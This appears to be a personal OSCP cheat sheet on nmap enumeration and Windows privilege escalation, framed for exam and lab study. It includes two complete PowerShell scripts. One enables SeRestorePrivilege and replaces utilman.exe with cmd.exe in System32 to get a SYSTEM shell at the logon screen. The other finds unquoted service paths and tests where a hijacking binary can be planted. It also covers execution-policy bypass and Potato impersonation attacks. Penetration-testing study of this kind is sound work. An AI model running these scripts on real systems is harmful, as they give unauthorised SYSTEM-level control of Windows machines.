OSCP Checklist

This is just a cheat sheet of sorts for myself.


Last updated 3 years ago

Enumeration

  • sudo nmap $target (quick first pass over the default top 1000 TCP ports)

  • sudo nmap -sC -sV -p- $target (all 65535 TCP ports with default scripts and version detection; slow, so start it in the background and work the quick results meanwhile)

  • sudo nmap --script vuln -p <open ports> $target to run the vuln script category only against the ports the scans above found open (comma-separated list, e.g. -p 21,80,445)

  • check HTML comments, especially on login or registration pages (credentials, hidden paths and version strings end up there)

  • windows machine: powershell -ep bypass to start PowerShell with the execution policy bypassed so downloaded .ps1 scripts can be imported

Windows

  • sudo nmap -Pn --script vuln vault.offsec (Windows hosts frequently drop ICMP, so -Pn skips host discovery and scans the host anyway; vault.offsec is the Vault practice box)

Post Exploit

Windows

  • whoami /priv

  • if SeRestorePrivilege is listed, even in the Disabled state, then

    • run EnableSeRestorePrivilege.ps1 to enable the privilege in the current PowerShell session. With it enabled the token bypasses the file ACLs that normally block renaming or replacing files, so we now effectively have write access to C:\Windows\System32.

  • if we also have RDP access and that write access to C:\Windows\System32, do the utilman exploit: move utilman.exe aside, move cmd.exe to utilman.exe, connect over RDP and press Win+U at the logon screen; winlogon launches utilman.exe (now cmd.exe) as SYSTEM.

  • see the windows privilege escalation page for the rest.

Check Existing Privileges

  • whoami /priv

    • if SeImpersonatePrivilege is present, try JuicyPotato (works on builds before Windows 10 1809 / Server 2019; the DCOM trick it relies on is fixed from those builds onward) or RoguePotato for newer targets (requires a redirector on the attacking machine, e.g. socat, forwarding TCP 135 back to the port RoguePotato listens on)
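The whole Windows branch above (whoami /priv triage, enabling SeRestorePrivilege, the utilman swap) as one added example. This is not the page's EnableSeRestorePrivilege.ps1 nor any other code from the original; the TokenPriv class and the Get-TokenPrivilegeName, Invoke-PrivTriage and Invoke-UtilmanSwap names are my own. It assumes a PowerShell session on the target (started with -ep bypass) and that %SystemRoot% resolves to the Windows directory; it enables the privilege with AdjustTokenPrivileges instead of importing a script.

```powershell
# Added example, not the page's EnableSeRestorePrivilege.ps1: triage the token
# with whoami /priv, enable SeRestorePrivilege in this process, then stage the
# utilman swap. Assumes a PowerShell session on the target (-ep bypass).

$tokenApi = @'
using System;
using System.Runtime.InteropServices;
public static class TokenPriv {
    [StructLayout(LayoutKind.Sequential)]
    public struct LUID { public uint LowPart; public int HighPart; }
    // TOKEN_PRIVILEGES holding exactly one LUID_AND_ATTRIBUTES entry.
    [StructLayout(LayoutKind.Sequential)]
    public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }
    [DllImport("kernel32.dll")] static extern IntPtr GetCurrentProcess();
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    static extern bool LookupPrivilegeValue(string host, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll,
        ref TOKEN_PRIVILEGES newState, uint bufLen, IntPtr prevState, IntPtr retLen);
    const uint TOKEN_ADJUST_PRIVILEGES = 0x20, TOKEN_QUERY = 0x8, SE_PRIVILEGE_ENABLED = 0x2;
    // True only if the privilege is now enabled. AdjustTokenPrivileges returns TRUE
    // even when the token never held it; that case shows up as ERROR_NOT_ALL_ASSIGNED (1300).
    public static bool Enable(string privilege) {
        IntPtr token;
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out token)) return false;
        LUID luid;
        if (!LookupPrivilegeValue(null, privilege, out luid)) return false;
        var tp = new TOKEN_PRIVILEGES { PrivilegeCount = 1, Luid = luid, Attributes = SE_PRIVILEGE_ENABLED };
        if (!AdjustTokenPrivileges(token, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero)) return false;
        return Marshal.GetLastWin32Error() == 0;
    }
}
'@
if (-not ('TokenPriv' -as [type])) { Add-Type -TypeDefinition $tokenApi }

function Get-TokenPrivilegeName {
    # whoami /priv prints one row per privilege the token holds. A row marked
    # Disabled is still usable once enabled, so only the name matters here.
    whoami /priv | Select-String '^(Se\w+Privilege)' | ForEach-Object { $_.Matches[0].Groups[1].Value }
}

function Invoke-PrivTriage {
    $privs = @(Get-TokenPrivilegeName)
    if ($privs -contains 'SeImpersonatePrivilege') {
        'SeImpersonatePrivilege: JuicyPotato before Windows 10 1809 / Server 2019, RoguePotato (needs a 135 redirector) after'
    }
    if ($privs -contains 'SeRestorePrivilege') {
        if ([TokenPriv]::Enable('SeRestorePrivilege')) {
            'SeRestorePrivilege enabled: this session can now move and rename files under System32'
        } else {
            'SeRestorePrivilege listed but could not be enabled in this token'
        }
    }
}

function Invoke-UtilmanSwap {
    # Requires SeRestorePrivilege enabled in this process: NTFS honours it when
    # adding or removing directory entries, so the renames succeed in System32
    # even though the ACL grants this user no write access there.
    $sys32 = Join-Path $env:SystemRoot 'System32'
    Move-Item -LiteralPath (Join-Path $sys32 'utilman.exe') -Destination (Join-Path $sys32 'utilman.old') -ErrorAction Stop
    Move-Item -LiteralPath (Join-Path $sys32 'cmd.exe')     -Destination (Join-Path $sys32 'utilman.exe') -ErrorAction Stop
    'RDP to the host and press Win+U at the logon screen: winlogon starts utilman.exe (now cmd.exe) as SYSTEM.'
    'Clean up from that shell: move utilman.exe cmd.exe and move utilman.old utilman.exe'
}

Invoke-PrivTriage
```

Invoke-UtilmanSwap is deliberately not called automatically: run it only after Invoke-PrivTriage reports the privilege enabled, and restore both files from the SYSTEM shell afterwards, otherwise cmd.exe stays missing from System32. The enabled privilege state is inherited by child processes, so the page's cmd-based `move` commands work equally well from this session.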

Check Unquoted Service Paths

wmic service get name, displayname, pathname, startmode |findstr /i "auto"| findstr /i /v "c:\windows\\" | findstr /i /v """

  • keeps auto-start services, drops anything under C:\Windows and drops paths that are already wrapped in quotes. Any remaining pathname containing a space (e.g. C:\Program Files\Some App\svc.exe) is resolved by trying each truncation point in turn (C:\Program.exe, then C:\Program Files\Some.exe), so a writable directory at one of those points lets you plant a binary that runs as the service account on the next start; confirm with icacls and check whether you can restart the service. wmic is deprecated on current Windows builds, so fall back to Get-CimInstance Win32_Service or sc qc where it is missing.
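The same check done with CIM instead of wmic, extended to enumerate every truncation point and probe whether the current user can write there. This is an added example, not the page's command: the Test-DirWritable, Get-ServiceExe, Get-UnquotedServicePath and Get-HijackCandidate names are my own, and it assumes only a PowerShell session on the Windows target (no admin rights are needed for the enumeration itself).

```powershell
# Added example, not from the page: unquoted service path check via CIM
# (wmic is deprecated on current builds), reporting which truncation point a
# low-privileged user can actually write to. Assumes a PowerShell session on
# the target; no elevated rights required for the enumeration.

function Test-DirWritable {
    param([string]$Dir)
    # A real write probe beats parsing ACLs: it accounts for group membership,
    # inheritance and deny ACEs exactly the way the kernel does.
    if ([string]::IsNullOrEmpty($Dir) -or -not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try { [IO.File]::WriteAllText($probe, ''); Remove-Item -LiteralPath $probe -Force; $true }
    catch { $false }
}

function Get-ServiceExe([string]$PathName) {
    # Executable portion of an unquoted command line: everything up to the first .exe.
    if ($PathName -match '^(.*?\.exe)') { $Matches[1] } else { $PathName }
}

function Get-UnquotedServicePath {
    # Mirrors the wmic | findstr chain: auto-start, outside C:\Windows, not quoted,
    # and the executable portion contains a space.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.StartMode -eq 'Auto' -and $_.PathName -and
            $_.PathName -notmatch '^"' -and
            $_.PathName -notmatch '^[A-Za-z]:\\Windows\\' -and
            (Get-ServiceExe $_.PathName) -match ' '
        } |
        ForEach-Object {
            [pscustomobject]@{
                Name   = $_.Name
                RunsAs = $_.StartName      # LocalSystem is the prize
                Exe    = Get-ServiceExe $_.PathName
            }
        }
}

function Get-HijackCandidate {
    param([string]$ExePath)
    # CreateProcess resolves an unquoted path by trying each space-delimited
    # prefix as "<prefix>.exe" in order, so every prefix is a place to plant a binary.
    $parts = $ExePath -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
        $dir = Split-Path -Parent $candidate
        [pscustomobject]@{ Candidate = $candidate; Writable = (Test-DirWritable $dir) }
    }
}

Get-UnquotedServicePath | ForEach-Object {
    $svc = $_
    foreach ($c in Get-HijackCandidate $svc.Exe) {
        $flag = if ($c.Writable) { 'WRITABLE ' } else { '' }
        '{0} (runs as {1}): {2}{3}' -f $svc.Name, $svc.RunsAs, $flag, $c.Candidate
    }
}
```

A WRITABLE candidate only pays off if the service will start again: check Restart-Service or sc start against your rights, or whether a reboot is reachable (SeShutdownPrivilege). The planted binary must behave as a service or spawn your payload and exit, otherwise the Service Control Manager kills it after the start timeout.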
